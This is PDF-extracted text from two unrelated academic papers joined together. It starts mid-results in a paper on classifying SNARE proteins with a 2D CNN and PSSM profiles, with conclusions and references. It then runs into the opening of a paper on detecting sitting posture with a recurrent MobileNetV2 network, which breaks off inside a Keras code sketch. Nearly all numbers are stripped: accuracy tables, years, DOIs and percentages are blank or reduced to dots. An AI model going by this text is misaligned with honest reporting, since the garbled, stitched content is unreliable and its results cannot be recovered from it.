We analyzed the amino acid composition, and its variance, in SNARE and non-SNARE sequences by computing the frequency of each residue in the two sets. Figure 2 illustrates the amino acids that occur with the highest frequencies in the two datasets: E, K, and L are most frequent in SNARE proteins, whereas G and P are most frequent in non-SNARE proteins. These amino acids therefore play an essential role in distinguishing SNARE proteins, and the model may exploit the features contributed by these residues to predict SNARE proteins accurately.

Performance for identifying SNARE proteins with the 2D CNN

We implemented our 2D CNN architecture using the Keras package with the TensorFlow backend. First, we searched for the optimal setup of the hidden layers by experimenting with four different filter sizes. Table 3 reports the cross-validation results obtained with the various filter layers: one filter configuration clearly stood out when identifying SNAREs, reaching the highest average cross-validation accuracy, and its results were higher than those obtained with the other filter settings.

Table 3. Performance results of identifying SNAREs with different filter layers (filters, sensitivity, specificity, accuracy, and MCC on the cross-validation data).
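The entries of the result tables are reported with the four metrics defined above. As a small sketch, the same quantities can be computed directly from confusion-matrix counts; the counts in the example below are invented purely to show the calculation.

```python
import math

def classification_metrics(tp: int, fp: int, tn: int, fn: int) -> dict:
    """Sensitivity, specificity, accuracy and MCC from a confusion matrix,
    equivalent to the N+/N- formulation above (N+_- = FN, N-_+ = FP)."""
    sens = tp / (tp + fn)
    spec = tn / (tn + fp)
    acc = (tp + tn) / (tp + tn + fp + fn)
    denom = math.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))
    mcc = (tp * tn - fp * fn) / denom if denom else 0.0
    return {"sensitivity": sens, "specificity": spec, "accuracy": acc, "mcc": mcc}

print(classification_metrics(tp=80, fp=10, tn=90, fn=20))
```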
Figure 3. Validation accuracy for identifying SNARE proteins with different optimizers.

The cross-validation sensitivity, specificity, and MCC of this configuration are given in Table 3, and we therefore adopted this number of filters for the hidden layers of our model. We then optimized the network using a variety of optimizers: RMSprop, Adam, Nadam, SGD, and Adadelta. The model was reinitialized, i.e., a new network was built, before each round of optimization to provide a fair comparison between the optimizers. The overall results are shown in Fig. 3, and we chose Nadam, the optimizer with the most consistent performance, to create our final model.

Improving performance and preventing overfitting with dropout

There was a fair difference in performance between the cross-validation dataset and the independent dataset, which is due to the higher sequence-similarity threshold retained in the cross-validation data; we address this issue here by applying dropout (Srivastava et al.). Table 4 presents the performance of the model as the dropout value was varied from 0 to 1. The best dropout value outperformed the others, with the sensitivity, specificity,
it can be seen that our d cnn exhibited higher performance than those of the other traditional machine learning techniques using the same experimental setup. especially, our d cnn outperformed other algorithms when using the independent dataset. comparative performance for identifying snares between d cnn and blast search pipeline to make our prediction have convincing, we aimed to simply blasting the snare and non-snare sequences. the objective of this step is to check whether the first non-identical match was a snare/non-snare protein. we then compared with our pssm via psi- blast and the performance results were shown in table . it is easy to say that we are le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparative performance between d cnn and other shallow neural networks. classifier cross-validation independent sens spec acc mcc sens spec acc mcc knn . . . . . . . . randomforest . . . . . . . gaussian . . . . . . . . svm . . . . . . . d cnn . . . . . . . . table comparative performance between our classification method and blast search pipeline. method cross-validation independent sens spec acc mcc sens spec acc mcc blast . . . . . . . . d cnn . . . . . . . . able to reach a better performance when using the pssm profiles to build a classifier. it also means that blast can search a sequence within motifs, but it cannot capture hidden information in sequences. therefore, it is necessary and useful to create an advanced classifier with stronger features e.g., pssm profiles in this study. furthermore, source codes and publicly accessible web-servers represent the current trend for developing various computational methods (chen et al., ; cheng, xiao & chou, a; cheng, xiao & chou, b; chou, cheng & xiao, ; feng et al., ; jia et al., ; khan et al., ; le, ho & ou, ; xiao et al., b). actually, they have significantly enhanced the impacts of computational biology on medical science (chou, ), driving medicinal chemistry into an unprecedented revolution (chou, ), here we also publish our source codes and dataset at https://github.com/khanhlee/snare-cnn for presenting the new method reported in this paper. conclusions deep learning, a leading technique in various fields, has been increasingly applied in bioinformatics and computational biology. this study approaches a novel for identifying snare proteins by using deep learning. the idea is to transform pssm profiles into matrices and use them as the input to d cnn architectures. we evaluated the performance of our model, which was developed by using a d cnn and pssm profiles, using -fold cross-validation and an independent testing dataset. our method produced superior performance, and compared to other state-of-the-art neural networks, it achieved a significant improvement in all the typical measurement metrics. using our model, new snare proteins can be accurately identified and used for drug development. moreover, the contribution of this study could help further research to promote the use of d cnn in bioinformatics, especially in protein function prediction. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/khanhlee/snare-cnn http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. 
author contributions • nguyen quoc khanh le conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • van-nui nguyen conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: data is available at github: https://github.com/khanhlee/snare-cnn. references altschul sf, madden tl, schäffer aa, zhang j, zhang z, miller w, lipman dj. . gapped blast and psi-blast: a new generation of protein database search programs. nucleic acids research ( ): – doi . /nar/ . . . amidi a, amidi s, vlachakis d, megalooikonomou v, paragios n, zacharaki ei. . enzynet: enzyme classification using d convolutional neural networks on spatial representation. peerj :e doi . /peerj. . burlet g, hindle a. . isolated guitar transcription using a deep belief network. peerj computer science :e doi . /peerj-cs. . chang c-c, lin c-j. . libsvm: a library for support vector machines. acm transactions on intelligent systems and technology ( ):article . chen j, liu h, yang j, chou k-c. . prediction of linear b-cell epitopes using amino acid pair antigenicity scale. amino acids ( ): – doi . /s - - - . chen w, ding h, zhou x, lin h, chou k-c. . irna(m a)-psednc: identifying n -methyladenosine sites using pseudo dinucleotide composition. analytical biochemistry – : – doi . /j.ab. . . . chen w, feng p-m, lin h, chou k-c. . irspot-psednc: identify recombination spots with pseudo dinucleotide composition. nucleic acids research ( ):e -e doi . /nar/gks . cheng x, xiao x, chou k-c. a. ploc-mplant: predict subcellular localization of multi-location plant proteins by incorporating the optimal go information into general pseaac. molecular biosystems ( ): – doi . /c mb j. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/khanhlee/snare-cnn http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /c mb j http://dx.doi.org/ . /peerj-cs. cheng x, xiao x, chou k-c. b. ploc-mvirus: predict subcellular localization of multi-location virus proteins via incorporating the optimal go information into general pseaac. gene : – doi . /j.gene. . . . cheng x, xiao x, chou k-c. a. ploc-meuk: predict subcellular localization of multi-label eukaryotic proteins by extracting the key go information into general pseaac. genomics ( ): – doi . /j.ygeno. . . . cheng x, xiao x, chou k-c. b. ploc-mgneg: predict subcellular localization of gram-negative bacterial proteins by deep gene ontology learning via general pseaac. genomics ( ): – doi . /j.ygeno. . . . cheng x, zhao s-g, lin w-z, xiao x, chou k-c. a. ploc-manimal: predict subcellular localization of animal proteins with both single and multiple sites. bioinformatics ( ): – doi . /bioinformatics/btx . cheng x, zhao s-g, xiao x, chou k-c. b. iatc-misf: a multi-label classifier for predicting the classes of anatomical therapeutic chemicals. bioinformatics ( ): – doi . /bioinformatics/btw . chou k-c. . prediction of signal peptides using scaled window. peptides ( ): – doi . /s - ( ) -x. chou k-c. . some remarks on protein attribute prediction and pseudo amino acid composition. 
journal of theoretical biology ( ): – doi . /j.jtbi. . . . chou k-c. . some remarks on predicting multi-label attributes in molecular biosystems. molecular biosystems ( ): – doi . /c mb g. chou k-c. . impacts of bioinformatics to medicinal chemistry. medicinal chemistry ( ): – doi . / . chou k-c. . an unprecedented revolution in medicinal chemistry driven by the progress of biological science. current topics in medicinal chemistry ( ): – doi . / . chou k-c, cheng x, xiao x. . ploc_bal-mhum: predict subcellular localization of human proteins by pseaac and quasi-balancing training dataset. genomics doi . /j.ygeno. . . . feng p, yang h, ding h, lin h, chen w, chou k-c. . idna ma-pseknc: identi- fying dna n -methyladenosine sites by incorporating nucleotide physicochemical properties into pseknc. genomics ( ): – doi . /j.ygeno. . . . feng p-m, chen w, lin h, chou k-c. . ihsp-pseraaac: identifying the heat shock protein families using pseudo reduced amino acid alphabet composition. analytical biochemistry ( ): – doi . /j.ab. . . . fernandes k, chicco d, cardoso js, fernandes j. . supervised deep learning embeddings for the prediction of cervical cancer diagnosis. peerj computer science :e doi . /peerj-cs. . honer wg, falkai p, bayer ta, xie j, hu l, li h-y, arango v, mann jj, dwork aj, trimble ws. . abnormalities of snare mechanism proteins in an- terior frontal cortex in severe mental illness. cerebral cortex ( ): – doi . /cercor/ . . . le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.gene. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /bioinformatics/btx http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . /c mb g http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /cercor/ . . http://dx.doi.org/ . /peerj-cs. hou c, wang y, liu j, wang c, long j. . neurodegenerative disease related proteins have negative effects on snare-mediated membrane fusion in pathological confir- mation. frontiers in molecular neuroscience : doi . /fnmol. . . jahn r, scheller rh. . snares—engines for membrane fusion. nature reviews molecular cell biology : – doi . /nrm . jia j, li x, qiu w, xiao x, chou k-c. . ippi-pseaac(cgr): identify protein- protein interactions by incorporating chaos game representation into pseaac. journal of theoretical biology : – doi . /j.jtbi. . . . jones dt. . protein secondary structure prediction based on position-specific scoring matrices . journal of molecular biology ( ): – doi . /jmbi. . . khan yd, rasool n, hussain w, khan sa, chou k-c. . iphost-pseaac: identify phosphothreonine sites by incorporating sequence statistical moments into pseaac. analytical biochemistry : – doi . /j.ab. . . . kienle n, kloepper th, fasshauer d. . phylogeny of the snare vesicle fusion machinery yields insights into the conservation of the secretory pathway in fungi. bmc evolutionary biology ( ): doi . / - - - . kloepper th, kienle cn, fasshauer d. . an elaborate classification of snare proteins sheds light on the conservation of the eukaryotic endomembrane system. molecular biology of the cell ( ): – doi . /mbc.e - - . kloepper th, kienle cn, fasshauer d. . snareing the basis of multicellularity: consequences of protein family expansion during evolution. 
molecular biology and evolution ( ): – doi . /molbev/msn . le nqk, ho q-t, ou y-y. . incorporating deep learning with convolutional neural networks and position specific scoring matrices for identifying electron transport proteins. journal of computational chemistry ( ): – doi . /jcc. . le nqk, ho q-t, ou y-y. . classifying the molecular functions of rab gtpases in membrane trafficking using deep convolutional neural networks. analytical biochemistry : – doi . /j.ab. . . . le nqk, ho q-t, ou y-y. . using two-dimensional convolutional neural networks for identifying gtp binding sites in rab proteins. journal of bioinformatics and computational biology ( ): doi . /s . le nqk, nguyen t-t-d, ou y-y. . identifying the molecular functions of electron transport proteins using radial basis function networks and bio- chemical properties. journal of molecular graphics and modelling : – doi . /j.jmgm. . . . le nqk, ou y-y. a. incorporating efficient radial basis function networks and significant amino acid pairs for predicting gtp binding sites in transport proteins. bmc bioinformatics ( ): doi . /s - - -y. le nqk, ou y-y. b. prediction of fad binding sites in electron transport proteins according to efficient radial basis function networks and significant amino acid pairs. bmc bioinformatics ( ): doi . /s - - -x. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /fnmol. . http://dx.doi.org/ . /nrm http://dx.doi.org/ . /j.jtbi. . . http://dx.doi.org/ . /jmbi. . http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . / - - - http://dx.doi.org/ . /mbc.e - - http://dx.doi.org/ . /molbev/msn http://dx.doi.org/ . /jcc. http://dx.doi.org/ . /j.ab. . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.jmgm. . . http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /peerj-cs. le nqk, sandag ga, ou y-y. . incorporating post translational modification information for enhancing the predictive performance of membrane transport proteins. computational biology and chemistry : – doi . /j.compbiolchem. . . . lecun y, bengio y, hinton g. . deep learning. nature ( ): – doi . /nature . lu b. . the destructive effect of botulinum neurotoxins on the snare protein: snap- and synaptic membrane fusion. peerj :e doi . /peerj. . meng j, wang j. . role of snare proteins in tumourigenesis and their potential as targets for novel anti-cancer therapeutics. biochimica et biophysica acta (bba) - reviews on cancer ( ): – doi . /j.bbcan. . . . ou yy, chen sa, gromiha mm. . classification of transporters using efficient radial basis function networks with position-specific scoring matrices and biochemical properties. proteins: structure, function, and bioinformatics ( ): – doi . /prot. . oyang y-j, hwang s-c, ou y-y, chen c-y, chen z-w. . data classifica- tion with radial basis function networks based on a novel kernel density es- timation algorithm. ieee transactions on neural networks ( ): – doi . /tnn. . . palatnik de sousa i. . convolutional ensembles for arabic handwritten character and digit recognition. peerj computer science :e doi . /peerj-cs. . qiu w-r, sun b-q, xiao x, xu z-c, chou k-c. . iptm-mlys: identifying multiple lysine ptm sites and their different types. bioinformatics ( ): – doi . /bioinformatics/btw . shi x, halder p, yavuz h, jahn r, shuman ha. . direct targeting of membrane fu- sion by snare mimicry: convergent evolution of legionella effectors. proceedings of the national academy of sciences of the united states of america ( ): – doi . 
/pnas. . shimizu k, hirose s, noguchi t. . poodle-s: web application for predicting protein disorder by using physicochemical features and reduced amino acid set of a position-specific scoring matrix. bioinformatics ( ): – doi . /bioinformatics/btm . spencer m, eickholt j, cheng j. . a deep learning network approach to ab initio protein secondary structure prediction. ieee/acm transactions on computational biology and bioinformatics (tcbb) ( ): – doi . /tcbb. . . srivastava n, hinton g, krizhevsky a, sutskever i, salakhutdinov r. . dropout: a simple way to prevent neural networks from overfitting. the journal of machine learning research ( ): – . sun q, huang x, zhang q, qu j, shen y, wang x, sun h, wang j, xu l, chen x, ren b. . snap promotes the malignant process of ovarian cancer. journal of ovarian research ( ): doi . /s - - - . le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.compbiolchem. . . http://dx.doi.org/ . /nature http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j.bbcan. . . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /tnn. . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /bioinformatics/btw http://dx.doi.org/ . /pnas. http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /tcbb. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. taju sw, nguyen t-t-d, le n-q-k, kusuma rmi, ou y-y. . deepefflux: a d convolutional neural network model for identifying families of efflux proteins in transporters. bioinformatics ( ): – doi . /bioinformatics/bty . uniprot consortium. . uniprot: a hub for protein information. nucleic acids research (d ):d –d doi . /nar/gku . van dijk adj, bosch d, ter braak cjf, van der krol ar, van ham rchj. . predicting sub-golgi localization of type ii membrane proteins. bioinformatics ( ): – doi . /bioinformatics/btn . wang k, hoeksema j, liang c. . pirnn: deep learning algorithm for pirna prediction. peerj :e doi . /peerj. . weimbs t, low sh, chapin sj, mostov ke, bucher p, hofmann k. . a conserved domain is present in different families of vesicular fusion proteins: a new superfam- ily. proceedings of the national academy of sciences of the united states of america ( ): – doi . /pnas. . . . wickner w, schekman r. . membrane fusion. nature structural & molecular biology ( ): doi . /nsmb. . xiao x, cheng x, chen g, mao q, chou k-c. a. ploc_bal-mgpos: predict sub- cellular localization of gram-positive bacterial proteins by quasi-balancing training dataset and pseaac. genomics doi . /j.ygeno. . . . xiao x, xu z-c, qiu w-r, wang p, ge h-t, chou k-c. b. ipsw( l)-pseknc: a two-layer predictor for identifying promoters and their strength by hybrid features via pseudo k-tuple nucleotide composition. genomics doi . /j.ygeno. . . . xu y, shao x-j, wu l-y, deng n-y, chou k-c. . isno-aapair: incorporating amino acid pairwise coupling into pseaac for predicting cysteine s-nitrosylation sites in proteins. peerj :e doi . /peerj. . yoshizawa ac, kawashima s, okuda s, fujita m, itoh m, moriya y, hattori m, kanehisa m. . extracting sequence motifs and the phylogenetic features of snare-dependent membrane traffic. traffic ( ): – doi . /j. - . . .x. le and nguyen ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/bty http://dx.doi.org/ . /nar/gku http://dx.doi.org/ . /bioinformatics/btn http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /pnas. . . http://dx.doi.org/ . /nsmb. http://dx.doi.org/ . /j.ygeno. . . http://dx.doi.org/ . /j.ygeno. . . 
http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. detection of sitting posture using hierarchical image composition and deep learning detection of sitting posture using hierarchical image composition and deep learning audrius kulikajevas , rytis maskeliunas and robertas damaševičius , department of multimedia engineering, kaunas university of technology, kaunas, lithuania department of applied informatics, vytautas magnus university, kaunas, lithuania faculty of applied mathematics, silesian university of technology, gliwice, poland abstract human posture detection allows the capture of the kinematic parameters of the human body, which is important for many applications, such as assisted living, healthcare, physical exercising and rehabilitation. this task can greatly benefit from recent development in deep learning and computer vision. in this paper, we propose a novel deep recurrent hierarchical network (drhn) model based on mobilenetv that allows for greater flexibility by reducing or eliminating posture detection problems related to a limited visibility human torso in the frame, i.e., the occlusion problem. the drhn network accepts the rgb-depth frame sequences and produces a representation of semantically related posture states. we achieved . % accuracy at fps rate for sitting posture recognition. subjects human-computer interaction, artificial intelligence, computer vision keywords posture detection, computer vision, deep learning, artificial neural network, depth sensors, sitting posture, e-health introduction machine learning and deep learning has shown very good results when applied to various computer vision applications such as detection of plant diseases in agriculture (kamilaris & prenafeta-boldú, ), fault diagnosis in industrial engineering (wen et al., ), brain tumor recognition from mr images (chen et al., a), segmentation of endoscopic images for gastric cancer (hirasawa et al., ), or skin lesion recognition (li & shen, ) and even autonomous vehicles (alam et al., ). as our daily life increasingly depends on sitting work and the opportunities for physical exercising (in the context of covid- pandemic associated restrictions and lockdowns are diminished), many people are facing various medical conditions directly related to such sedentary lifestyles. one of the frequently mentioned problems is back pain, with bad sitting posture being one of the compounding factors to this problem (grandjean & hünting, ; sharma & majumdar, ). inadequate postures adopted by office workers are one of the most significant risk factors of work-related musculoskeletal disorders. the direct consequence may be back pain, while indirectly it has been associated with cervical disease, myopia, cardiovascular diseases and premature mortality (cagnie et al., ). one study (alberdi et al., ) has demonstrated that body posture is one of the best predictors of stress and mental workload levels. another study linked postural instability and gait difficulty with a rapid rate of parkinson’s disease progression how to cite this article kulikajevas a, maskeliunas r, damaševičius r. . detection of sitting posture using hierarchical image composition and deep learning. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted february published march corresponding author robertas damaševičius, robertas.damasevicius@polsl.pl academic editor siddhartha bhattacharyya additional information and declarations can be found on page doi . /peerj-cs. 
copyright kulikajevas et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:robertas.�damasevicius@�polsl.�pl https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ (jankovic et al., ). posture recognition is also relevant for disabled people (ma et al., ) and elderly people for proper health diagnostics (chen et al., b) as the sedentary behavior has a negative effect on people’s wellbeing and health. therefore, the solutions that would improve the daily living conditions of both healthy and spine pain affected people in the context of assisted living environments (maskeliunas, damaševičius & segal, ). while there are existing classical approaches for human posture prediction, unfortunately, they generally assert that entire human skeleton is visible in frame. even though those assumptions of scene composition are valid, with everyone moving to their home offices, meeting them is simply not feasible. not everyone is capable of having complex multi-camera setups to track their body posture. for this reason, there is a need for a solution that is able to inform the end-user (or their care provider) of their bad posture with cheaply available consumer sensors in order to improve their wellbeing without real-time supervision. with the renaissance of machine learning, and its application in computer vision tasks, we are able to solve a lot of complex tasks using black box models by shifting the majority of computations from the end-user device into the training stage. for this reason, artificial neural networks have been used in wide variety of applications. in this article, we propose a novel deep recurrent hierarchical neural network approach for tracking human posture in home office environments, where majority of the person sitting at the desk and therefore is occluded from the camera. additionally, a pilot of test subjects is made in order to validate our approach effectiveness. related work the existing solutions such as orthopedic posture braces may not be viable solution due to other underlying medical conditions. computer-aided posture tracking combined with behaviour improvement techniques due to continuous monitoring and self-assessment can contribute to remedy this issue (dias & cunha, ). the most prominent solution to this problem is skeleton based posture recognition (jiang et al., ) using commercially available depth sensors such as microsoft kinect (zhang, ) and intel realsense (keselman et al., ). however, these solutions generally depend on some assertions, i.e., camera calibration settings, lightning conditions, expected posture (hondori & khademi, ), often making the results unreliable. for identifying inadequate posture wearable textile sensors (garcía patiño, khoshnam & menon, ), inertial and magnetic sensors attached to human body (bouvier et al., ), depth cameras (ho et al., ), radio-frequency identification tags (saab & msheik, ), d motion analysis (perusquía-hernández et al., ), video surveillance (afza et al., ), kinect sensors (ryselis et al., ) and sensors attached to office chairs (zemp et al., ; bibbo et al., ) were used, while registering body posture parameters such as forward inclination, distance to the computer, and relative skeletal angles. 
however, the camera-based systems have demanding requirements for distance, proper lighting, calibration and non-occlusion. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ another approach focuses on wiring sensors directly to the human body to acquire data, although it limits the freedom of movement for work activities (arnold et al., ). despite these achievements, it is still quite difficult to recognize posture in real-time or correctly identify transitional activities in real-world environments (nweke et al., ) as the recognition of fine-grained activities such as correct or incorrect cases of sitting postures is still a problem (chin et al., ). currently, the state of the art in non-invasive posture tracking is depth and image processing (abobakr, hossny & nahavandi, ; matthew et al., ; camalan et al., ). for example, huang & gao ( ) reconstruct realistic d human poses using the d coordinates of joint points captured by the depth camera and employ conformal geometric algebra to improve human limb modelling. li, bai & han ( ) used optitrack and kinect v to get and transfer data into a human skeleton coordinates. they used random forest regression learn the joint offset regression function, and adjust the skeleton based on the predictions on joint offset. finally, as a result, they can determine the motions based on predicted posture. liu et al. ( ) suggested d convolutional neural network (cnn), called d posturenet, while gaussian voxel modeling is adopted to represent posture configurations. the method allows to eliminate the coordinate deviations caused by various recording environments and posture displacements. pham et al. ( ) exploit deep cnns based on the densenet model to learn directly an end-to- end mapping between the input skeleton sequences and their action label for human activity recognition. the network learns spatio—temporal patterns of skeletal movements and their discriminative features for further downstream classification tasks. sengupta et al. ( ) detect skeletal joints using mmwave radar reflection signals. first, the reflected radar point cloud. next, cnn was trained on radar-to-image representation and used to predict the position of the skeletal joints in -d space. the method was evaluated in a single person scenario using four primary motions. the method has shown to be robust in adverse weather conditions and deviations in light conditions. however, none of the above mentioned methods are applicable when only the upper part of the body is visible. some methods tried to tackle this problem by exploiting the temporal relationship between the body parts to deal with the occlusion problem and to get the occluded depth information (huang, hsu & huang, ) or by recreating a topological character (bei et al., ), yet they still require a recreation of a full body skeleton. to address this problem, we propose a novel approach for human posture classification by using a supervised hierarchical neural network (liu et al., ) that uses the rgb-depth data as input. our method extends mobilenetv (sandler et al., ) neural network to include the recurrent layers. this allows the network to learn from a sequence of images by adding the dimension of time to our feature list. allowing the network to use the context of what happened in previous frames to make predictions. 
this is an improvement over existing methods for skeleton prediction as this allows for our approach to predict user posture in more complex environments, for example, when a person is sitting in front of an office desk thus a large portion of his/her body is occluded. kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ such position would cause other known skeleton-based posture prediction methods to fail, due to lack of data provided by the sensors to infer the full human skeleton. our novelty is the use only a simple depth camera, so the subject does not need to wear any sensors on their body nor have entire body visible in sensor field of view. in fact, only the upper % of the body may be visible, whereas when using the kinect style sensor, the lower legs must be visible or generated artificially to allow the reconstruction of the skeleton or, otherwise, the recognition process fails. our approach does not rely on a (visual or artificial) reconstruction of the full skeleton and, thus, allows for the detection of posture in advanced scenarios such as sitting at a desk, where a camera often receives very limited information. methods network architecture our preliminary analysis has shown that it is very hard to predict human posture based on a single shot. for this reason, we opted to use time sequences with n = frames. however, during training the input has a variable length of ≤ n ≤ , with each frame being about a second apart to reduce the dependence on the previous frames. we selected to use deep convolutional recurrent neural networks for they have shown some of the best capabilities when it comes to similar tasks requiring to predict sequences of data as with natural speech recognition (sundermeyer, ney & schlu, ; graves, mohamed & hinton, ) or even traffic prediction (ji & hong, ). the input of our network architecture (fig. ) is the rgb-d frame sequence that is fed into depth-wise convolutional block (zhang et al., ), which reduces the dimensionality of each frame by a factor of two, without losing each individual channel’s influence on the output. this is due to depth-wise convolutions applying separate kernels for each channel. this is then followed by a convolutional layer in order to extract the best individual features, which is followed by a second dimensionality reduction layer. we do this because our input frames are captured at × px resolution, which is the maximum hardware resolution of the intel realsense d i device. reducing the dimensionality twice leaves us with features, each of × px resolution. at this stage, we use long short term memory (lstm) convolutional block (xu et al., ; li et al., ), which is tasked to extract most useful features in the entire sequence. figure our recurrent hierarchical ann architecture using mobilenetv as the main backbone. it takes the rgb-d frame sequence as input and outputs the flattened prediction tree as a result. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
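As a quick illustration of the two reduction blocks just described, the sketch below shows how a stride-2 depthwise convolution halves the spatial resolution while keeping a separate kernel per input channel, and how the following regular convolution then mixes channels into richer features. The 640 x 480 RGB-D input and the filter count of 32 are assumptions, since the exact numbers are not recoverable from this text.

```python
# Shape sanity-check only: two depthwise reduction blocks leave a quarter of the
# original resolution in each spatial dimension.
import tensorflow as tf
from tensorflow.keras import layers

x = tf.zeros((1, 480, 640, 4))                                   # one RGB-D frame: H x W x (RGB + depth)
x = layers.DepthwiseConv2D(3, strides=2, padding="same")(x)       # per-channel kernels, spatial /2
x = layers.Conv2D(32, 3, padding="same", activation="relu")(x)    # mixes channels into features
x = layers.DepthwiseConv2D(3, strides=2, padding="same")(x)       # second reduction, spatial /2 again
x = layers.Conv2D(32, 3, padding="same", activation="relu")(x)
print(x.shape)                                                    # (1, 120, 160, 32)
```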
https://peerj.com/computer-science/ for our main neural network backbone, we use mobilenetv , which is the extension of mobilenet, for it has show to achieve great results in predictive capabilities (howard et al., ; zhou et al., ), however, the architecture itself is relatively light-weight for it is designed to be used in low power devices such as mobile devices, unlike for example, yolov , which while having impressive recall results (redmon & farhadi, ), is much more complex and has a substantially poorer performance. the mobilenetv output is then connected to a global average pooling layer in order to reduce dimensionality and improve generalization rate (zhou et al., ). finally, the output is subsequently connected to a fully-connected layer, which represents the flattened representation of posture state prediction hierarchy, which can be seen in fig. . our entire ann setup can be seen in table . after each of two bottleneck layers we additionally use spatial dropout layers as it is shown to improve generalization during training and reduce the effect of nearby pixels being strongly correlated within the feature maps (murugan & durairaj, ), each with dropout probability of . , whereas the spatial dropout post lstm cell has a dropout probability of . , because the higher the network is upstream the more dropout layers influence the entire network, therefore high values upstream may cause the network to be more unstable and difficult to train. the dropout layer before the output layer however, has a dropout probability of %. aggressive dropout values reduce the chance that the model is will overfit by training on noise instead of image features. all our previous layers up to this point had used rectified linear unit as our activation function in order to impose non-linearity into our model for it has shown better results and improved performance due to its mathematical simplicity in cnns (hanin, ). however, for the last layer we opted to use the sigmoid activation due to our network outputting hierarchical values and acting as multi-label classifier, while the softmax activation is more useful for multi-class classification tasks. figure flattened hierarchy representation of postures expanded into a hierarchical tree. full-size doi: . /peerj-cs. /fig- kulikajevas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ algorithm of sitting posture detection figure depicts algorithm of our enhanced posture detection solution. process starts with the initialization of model weights for sorting out the rgb-d camera output (both depth and rgb as varying on the condition either modality can provide compensation features). algorithm then tries to reconstruct intermediate frame for retrieval and analysis of frame semantics, which are then used for stack validity status verification. assuming the condition, analysis starts in the recurrent layers of our modified mobilenet v architecture, with pareto-optimal berparameter optimization (plonis et al., ). the model then assigns prediction labels and algorithm further tries to improve the quality by firing smart semantic prediction analyzer, checking not only the output value but probable output status for a combined confidence level of < %, as an improved determinator for further frame semantic analysis. a final validity status is then initiated, depending on condition leading to a majority voting and a very reliable detection of bad posture. 
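A minimal sketch of how the overall architecture described above could be assembled in Keras follows. It is not the authors' released model: the sequence length, frame size, filter counts, dropout rates, and the nine-unit output (three branch nodes plus six leaf labels) are assumptions, and MobileNetV2 is instantiated with random weights so that it accepts the 32-channel feature maps produced by the convolutional LSTM stage.

```python
# Sketch of a recurrent hierarchical network: per-frame reduction blocks, a ConvLSTM
# that collapses the time axis, a MobileNetV2 feature extractor trained from scratch,
# global average pooling, and a sigmoid multi-label head for the flattened hierarchy.
import tensorflow as tf
from tensorflow.keras import layers, models

SEQ_LEN, H, W, C = 4, 480, 640, 4        # frames per sequence, frame size, RGB + depth (assumed)

def reduction_block(x, filters, rate):
    x = layers.TimeDistributed(layers.DepthwiseConv2D(3, strides=2, padding="same"))(x)
    x = layers.TimeDistributed(layers.Conv2D(filters, 3, padding="same", activation="relu"))(x)
    return layers.TimeDistributed(layers.SpatialDropout2D(rate))(x)

inputs = layers.Input(shape=(SEQ_LEN, H, W, C))
x = reduction_block(inputs, 32, 0.2)
x = reduction_block(x, 32, 0.2)
x = layers.ConvLSTM2D(32, 3, padding="same")(x)        # summarises the whole frame sequence
x = layers.SpatialDropout2D(0.1)(x)
backbone = tf.keras.applications.MobileNetV2(
    input_shape=(H // 4, W // 4, 32), include_top=False, weights=None)
x = layers.GlobalAveragePooling2D()(backbone(x))
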